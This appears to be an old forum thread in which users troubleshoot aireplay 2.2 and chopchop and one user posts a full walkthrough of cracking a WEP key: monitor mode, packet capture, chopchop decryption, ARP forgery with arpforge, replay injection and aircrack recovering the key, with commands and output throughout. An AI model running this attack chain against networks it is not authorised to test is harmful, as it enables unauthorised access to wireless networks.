2marshall8

I'm looking for either a tarball that has Aireplay compiled with the patch Korek came up with for injecting and sniffing on the same NIC, or the wlan-ng patch which is applied to aireplay to enable this. Where can I get this? I looked in other threads and only found people talking about how they had tried it. I would really like to try this on my AP to see if I can get it to work.

thanks
marshall

devine

Try http://www.cr0.net:8040/code/network/aireplay-2.2.tgz

tekn0

im having a little problem with the arp request forgery technique in your
readme, i know it's not directly related to aireplay 2.2 but i thought my
problem might be of help for future verison features/ideas and if not im
sorry and i understand :)

here is my output sorry but it's a but long.
packets came from going to a web site on a client machine.

D-Link=00:0D:88:8D:18:2F
WinXP=00:04:E2:D8:7B:AF

root@tekn0:~/root/aireplay-2.2# ./aireplay -i wlan0 -b 00:0D:88:8D:18:2F
Seen 23 packets, none usable...
Found one usable WEP data packet:

From DS = 1, To DS = 0
BSSID = 00:0D:88:8D:18:2F
Src. MAC = 00:04:E2:D8:7B:AF
Dst. MAC = FF:FF:FF:FF:FF:FF

0x0000: 0842 0000 ffff ffff ffff 000d 888d 182f .B............./
0x0010: 0004 e2d8 7baf c039 720b 0000 4748 2efd ....{..9r...GH..
0x0020: 764c 584c 7458 74fd 2415 8431 19be 090c vLXLtXt.$..1....
0x0030: 13ef 6747 deeb 94f1 39d8 0264 0b63 492e ..gG....9..d.cI.
0x0040: fc5d 4cc4 .]L.

Replay this packet ? n
Seen 24 packets, none usable...
Found one usable WEP data packet:

From DS = 1, To DS = 0
BSSID = 00:0D:88:8D:18:2F
Src. MAC = 00:04:E2:D8:7B:AF
Dst. MAC = FF:FF:FF:FF:FF:FF

0x0000: 0842 0000 ffff ffff ffff 000d 888d 182f .B............./
0x0010: 0004 e2d8 7baf d039 730b 0000 f139 86f9 ....{..9s....9..
0x0020: 8ea9 2e1b 7858 88a6 325d d0c0 afd6 72cc ....xX..2]....r.
0x0030: f21e a8ca 20ea 8f07 b883 bcbd d47a ec1f .... ........z..
0x0040: 424f af5d BO.]

Replay this packet ? n
Seen 25 packets, none usable...
Found one usable WEP data packet:

From DS = 1, To DS = 0
BSSID = 00:0D:88:8D:18:2F
Src. MAC = 00:0D:88:8D:18:2F
Dst. MAC = 00:04:E2:D8:7B:AF

0x0000: 0842 7500 0004 e2d8 7baf 000d 888d 182f .Bu.....{....../
0x0010: 000d 888d 182f e039 912b 0000 a319 731f ...../.9.+....s.
0x0020: bf78 0abc 34cf 559e a2ac 1b39 0175 211f .x..4.U....9.u!.
0x0030: ce35 2f44 1d77 db46 71eb 3bb7 093b 5502 .5/D.w.Fq.;..;U.
0x0040: a63d cc5e 6080 91c0 .=.^`...

Replay this packet ? y
Saving replayed packet in replay-20050201_2144.cap
root@tekn0:~/root/aireplay-2.2# ./chopchop-0.1/chopchop -b 00:0D:88:8D:18:2F -m 00:04:E2:D8:7B:AF -p replay-20050201_2144.cap
00:0D:88:8D:18:2F 6
0
00:04:E2:D8:7B:AF 6
first pass
-----------------
packet number 001
base src mac: 00 04 e2 d8 7b af
base dst mac: ff 0a 2d 13 49 38
guess 0x7a / number of frame written 130
guess 0x67 / number of frame written 104
guess 0xcb / number of frame written 208
guess 0xbe / number of frame written 195
guess 0x6e / number of frame written 117
guess 0x00 / number of frame written 9
guess 0xa8 / number of frame written 169
guess 0xc0 / number of frame written 195
guess 0x6e / number of frame written 117
guess 0x00 / number of frame written 5
guess 0xa8 / number of frame written 169
guess 0xc0 / number of frame written 195
guess 0xaf / number of frame written 182
guess 0x7b / number of frame written 130
guess 0xd8 / number of frame written 221
guess 0xe2 / number of frame written 234
guess 0x04 / number of frame written 13
guess 0x00 / number of frame written 8
guess 0x01 / number of frame written 7
guess 0x00 / number of frame written 4
guess 0xa8 / number of frame written 169
guess 0xc0 / number of frame written 195
guess 0x2f / number of frame written 52
guess 0x18 / number of frame written 39
guess 0x8d / number of frame written 143
guess 0x88 / number of frame written 143
guess 0x0d / number of frame written 273
guess 0x00 / number of frame written 12
guess 0x02 / number of frame written 13
guess 0x00 / number of frame written 13
guess 0x04 / number of frame written 13
guess 0x06 / number of frame written 13

then it just hangs and does nothing
am i not waiting long enough?, waited 5 minutes.

i have tried a few diffrent packets although im not sure what types they
were nore the sizes but they all hang in the same manner, they spit out a
bunch of "frame written 13" at the end

i fallowed the instructions in the readme although im not sure exactly
what packet to pick i tired to use ones that had source and dest fields
filled in and not use any packets with ff:ff:ff:ff:ff:ff for the dst mac.

also does aireplay 2.2 have any way to display the packet
size when it's asking you if you want to use the packet and would you know
of the best packets to use, i know arps/tcp ack/and dhcp are supposet to
work well but im not sure the best way to tell the size of the packet.

thanks again for such a great tool and all your time and help.

sylvain

I had the same problem...it's more chopchop performance than aireplay... in general it takes too much time to decrypt the packet with chopchop

sylvain

It's why attack a and b in aireplay-2.2 are still more effective...

devine

Yep, I had the same problem too. Anyway I'll code a new version of chopchop, as some modifications are needed to make it support prism54 and madwifi injection.

sylvain

you're the man christophe !

Dutch

You rock!!!

Dutch

__________________
All your answers are belong to Google. SEARCH DAMMIT!
Warning. Warning.
Low C8H10N4O2 level detected. Operator halted....

Dutch

Before doing anything else, read ALL the posts in the Welcome Desk section, paying particular notice to the post regarding the usage of proper English on the forums.
If you don't start using cpaitalization and punctuation in your posts, they WILL be deleted.
Final warning.

Dutch

__________________
All your answers are belong to Google. SEARCH DAMMIT!
Warning. Warning.
Low C8H10N4O2 level detected. Operator halted....

tekn0

I just had complete success.
Sorry again for the long post.

System: Slackware 10 2.4
Card: SMC 2532W-B Elite Connect PCMCIA

(Macs Have Been Changed To Protect The Innocent)
First i set the network state and put the card into monitor mode.
Then i started sniffing for my router and found it,
but im not running wpa (maybe a new linksys firmware trick).

root@tekn0:~# state.wlan wlan0 enable ; monitor.wlan wlan0 6
root@tekn0:~# airodump wlan0 linksys2

BSSID CH MB ENC PWR Packets LAN IP / # IVs ESSID

12:12:12:12:12:12 6 48 WPA -1 100 10 linksys

Then i started aireplay to get a usable data packet.
After a bunch of random packets i decided to try this one for some reason.

root@tekn0:~#./aireplay -i wlan0 -b 12:12:12:12:12:12
(ABOUT 10 PACKETS DOWN i think i pressed "n" about 10 times hehe)
Found one usable WEP data packet:

From DS = 1, To DS = 0
BSSID = 12:12:12:12:12:12
Src. MAC = 34:34:34:34:34:34
Dst. MAC = FF:FF:FF:FF:FF:FF

0x0000: 0842 0000 ffff ffff ffff 0012 173f 9cf2 .B...........?..
0x0010: 0011 9518 3d42 d0c5 a785 0b00 a993 bbb0 ....=B..........
0x0020: bb03 1cde 2151 5b7a 54bc 4d03 b728 d7ab ....!Q[zT.M..(..
0x0030: 1553 cd37 56ee 0be4 f881 46e1 eb15 f75b .S.7V.....F....[
0x0040: 4f40 a83e a88a b7cf b00f 871c 78d0 e6f7 O@.>........x...
0x0050: d50a 8f9d d14d 3753 2528 b7bf 4dcc c226 .....M7S%(..M..&
0x0060: ccf4 53e8 da74 78f1 d158 15ff 0707 9fbe ..S..tx..X......
0x0070: db17 fa4a da42 8e8d 8157 7291 eaa9 7b5f ...J.B...Wr...{_
0x0080: bb4c 5fbd b681 4c09 .L_...L.

Replay this packet ? y
Saving replayed packet in replay-20050202_2102.cap

Next i ran chopchop with the new packet and crossed my fingers. :)

root@tekn0:~# ./chopchop-0.1/chopchop -i wlan0 -b 12:12:12:12:12:12 -m 34:34:34:34:34:34 -p replay-20050202_2102.cap
12:12:12:12:12:12 6
0
34:34:34:34:34:34 6
first pass
-----------------
packet number 001
base src mac: 12 12 12 12 12 12 <-----(THIS WAS DIFFRENT FROM WHAT I ENTERED ON THE COMMAND LINE BUT I CHANGED IT FOR THIS POST)
base dst mac: 34 34 34 34 34 34 <-----(THIS WAS ALSO DIFFRENT)
guess 0xaa / number of frame written 183
guess 0x06 / number of frame written 27
guess 0x85 / number of frame written 156
guess 0x77 / number of frame written 131
guess 0x65 / number of frame written 110
guess 0x01 / number of frame written 25
guess 0xa8 / number of frame written 197
guess 0xc0 / number of frame written 207
guess 0x00 / number of frame written 24
guess 0xe0 / number of frame written 496
guess 0x06 / number of frame written 28
guess 0x00 / number of frame written 27
guess 0xe0 / number of frame written 236
guess 0x93 / number of frame written 158
guess 0x04 / number of frame written 27
guess 0x00 / number of frame written 21
guess 0x01 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x20 / number of frame written 66
guess 0x00 / number of frame written 19
guess 0x0c / number of frame written 14
guess 0xc0 / number of frame written 222
guess 0x01 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x20 / number of frame written 40
guess 0x00 / number of frame written 14
guess 0x00 / number of frame written 23
guess 0x4f / number of frame written 86
guess 0x42 / number of frame written 80
guess 0x41 / number of frame written 79
guess 0x43 / number of frame written 79
guess 0x41 / number of frame written 80
guess 0x43 / number of frame written 93
guess 0x41 / number of frame written 93
guess 0x43 / number of frame written 92
guess 0x41 / number of frame written 92
guess 0x43 / number of frame written 79
guess 0x41 / number of frame written 79
guess 0x43 / number of frame written 92
guess 0x41 / number of frame written 79
guess 0x43 / number of frame written 79
guess 0x41 / number of frame written 71
guess 0x43 / number of frame written 76
guess 0x46 / number of frame written 79
guess 0x45 / number of frame written 92
guess 0x46 / number of frame written 79
guess 0x46 / number of frame written 72
guess 0x42 / number of frame written 86
guess 0x46 / number of frame written 92
guess 0x43 / number of frame written 75
guess 0x46 / number of frame written 78
guess 0x42 / number of frame written 77
guess 0x45 / number of frame written 79
guess 0x4e / number of frame written 105
guess 0x45 / number of frame written 79
guess 0x42 / number of frame written 352
guess 0x45 / number of frame written 73
guess 0x4d / number of frame written 92
guess 0x45 / number of frame written 88
guess 0x20 / number of frame written 53
guess 0x01 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 26
guess 0x01 / number of frame written 22
guess 0x00 / number of frame written 27
guess 0x10 / number of frame written 27
guess 0x29 / number of frame written 53
guess 0x14 / number of frame written 27
guess 0x80 / number of frame written 156
guess 0xda / number of frame written 235
guess 0x6f / number of frame written 131
guess 0x4c / number of frame written 101
guess 0x00 / number of frame written 27
guess 0x89 / number of frame written 149
guess 0x00 / number of frame written 14
guess 0x89 / number of frame written 170
guess 0x00 / number of frame written 27
guess 0xff / number of frame written 261
guess 0x01 / number of frame written 27
guess 0xa8 / number of frame written 176
guess 0xc0 / number of frame written 222
guess 0x65 / number of frame written 123
guess 0x01 / number of frame written 21
guess 0xa8 / number of frame written 182
guess 0xc0 / number of frame written 222
guess 0x94 / number of frame written 157
guess 0xb5 / number of frame written 196
guess 0x11 / number of frame written 27
guess 0x80 / number of frame written 144
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 517
guess 0x44 / number of frame written 70
guess 0x00 / number of frame written 27
guess 0x60 / number of frame written 105
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x45 / number of frame written 79
OK

second pass
root@tekn0:~#

Awesome it worked :) And it only took like 1 min.
Notice There is not any instance of "frame written 13" (maybe thats the unlucky number?)
Then i used arpforge to create the forged packet.

root@tekn0:~# ./arpforge replay-20050202_2102.cap.iv.a7850b00 1 12:12:12:12:12:12 34:34:34:34:34:34 192.168.1.100 192.168.1.1 replay-test.cap
Done.

After that i replayed it.

root@tekn0:~# ./aireplay -r replay-test.cap wlan0

Found one usable WEP data packet:

From DS = 0, To DS = 1
BSSID = 12:12:12:12:12:12
Src. MAC = 34:34:34:34:34:34
Dst. MAC = FF:FF:FF:FF:FF:FF

0x0000: 0841 0201 0012 173f 9cf2 0011 9518 3d42 .A.....?......=B
0x0010: ffff ffff ffff 8001 a785 0b00 a993 bbb0 ................
0x0020: bb03 1cd8 6450 531a 52fc 4d02 3728 f727 ....dPS.R.M.7(.'
0x0030: e8b9 0cfa 9722 0a1b f808 4668 2bf1 9980 ....."....Fh+...
0x0040: 20f6 ba9c ...

Replay this packet ? y
Saving replayed packet in replay-20050202_2107.cap
Open airodump in another console to capture replies.
Sent 300599 packets at 247 pkt/s

Then i captured in airodump for about 20 mins and after 240,000+ IV's aircrack cracked it :)

root@tekn0:~# aircrack -n 64 linksys2.cap
Opening pcap file linksys2.cap
Choosing first WEP-encrypted BSSID = 12:12:12:12:12:12

aircrack 2.1

* Got 248182! unique IVs | fudge factor = 2
* Elapsed time [00:00:01] | tried 4 keys at 240 k/m

KB depth votes
0 0/ 3 AB( 33) F0( 33) ED( 17) 65( 15) C9( 15) AC( 12)
1 0/ 3 CD( 28) 30( 16) 3E( 15) 70( 13) CE( 12) 36( 10)
2 0/ 1 EF( 60) 6A( 21) 6F( 12) 77( 12) 50( 7) 6B( 6)
3 1/ 7 12( 15) 29( 15) 31( 15) 52( 15) 13( 12) 25( 12)
4 0/ 3 34( 27) 58( 15) 5B( 15) 5C( 12) EA( 12) 5E( 11)

KEY FOUND! [ 123456789a ]

EOF.

I hope this helps and thanks again for such amazing work :)
Also i still have the magic packet i used in replay-20050202_2102.cap if needed.

sylvain

how did you choose this "magic" packet ? you said you type 10 times "n" before choosing this one ? why did you do that ? just chance ?

tekn0

No idea really, it just looked right to me, kinda strange heh.
So yes just a chance i guess.

KoreK

What kind of packet was it, tekn0? My guess is non arp/ip, and I've got some bug in my code.

sylvain

yep, could you please open the .cap file where the magic packet is with ethereal and put the result here.
thanks

Shockwave

Hello,

chopchop hangs here for some hours now and I wonder how long it can take to finish working...

first pass
-----------------
packet number 001
base src mac: 00 0f b5 20 b2 ae
base dst mac: ff 59 fd c0 e5 a9

Also it does not use 100% CPU power, just ~50%...

Greets